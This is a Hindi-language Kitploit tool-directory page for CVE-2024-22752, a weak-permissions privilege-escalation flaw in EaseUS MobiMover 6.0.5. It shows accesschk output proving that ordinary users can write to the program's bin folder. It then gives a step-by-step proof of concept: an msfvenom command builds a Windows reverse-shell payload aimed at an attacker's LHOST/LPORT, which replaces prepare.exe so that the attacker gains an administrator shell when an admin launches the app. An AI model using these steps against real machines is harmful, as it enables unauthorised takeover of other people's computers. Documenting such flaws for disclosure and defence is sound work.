Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-22752 — EaseUS MobiMover 6.0.5 Build 21620 - असुरक्षित फ़ाइल और फ़ोल्डर अनुमतियाँ | Kitploit
उपकरण/GitHubGitHub/hacker625/cve-2024-22752
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणगलत कॉन्फ़िगरेशनबाइनरी शोषण
GitHubhacker625/cve-2024-22752

CVE-2024-22752

EaseUS MobiMover 6.0.5 Build 21620 - असुरक्षित फ़ाइल और फ़ोल्डर अनुमतियाँ

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EaseUS MobiMover 6.0.5 Build 21620 - असुरक्षित फ़ाइलें और फ़ोल्डर अनुमतियाँ

MobiMoverUILaunch.exe विशेषाधिकार वृद्धि (elevation of privileges) भेद्यता से ग्रस्त है, जिसका उपयोग कोई "Authenticated User" सेवा की निष्पादन योग्य फ़ाइल को bin फ़ोल्डर के अंतर्गत अपनी पसंद के बाइनरी से संशोधित करने के लिए कर सकता है। यह भेद्यता "Authenticated Users Group" को दिए गए कमजोर अनुमतियों के सेट के कारण मौजूद है, जो (M) फ्लैग (अर्थात "Modify Privilege") प्रदान करता है।

alt text

विक्रेता का होमपेज: https://www.easeus.com/
सॉफ़्टवेयर लिंक: https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
POC वीडियो: https://www.youtube.com/watch?v=FR4cQm-z4Gw

#PoC

root@kitploit:~
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
        FILE_ALL_ACCESS
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  1. Kali Linux पर msfvenom के साथ दुर्भावनापूर्ण बाइनरी फ़ाइल बनाएं
    msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe

  2. निर्मित 'prepare.exe' को Kali से Windows होस्ट पर निम्न-स्तरीय उपयोगकर्ता पहुँच के रूप में स्थानांतरित करें

  3. निर्मित 'prepare.exe' बाइनरी फ़ाइल को 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' पर ले जाकर पुरानी फ़ाइल को निम्न-स्तरीय उपयोगकर्ता पहुँच के रूप में बदलें

  4. जब प्रशासक एप्लिकेशन चलाता है, तो आपको प्रशासक के रूप में रिवर्स शेल प्राप्त होगा

टूल डाउनलोड करें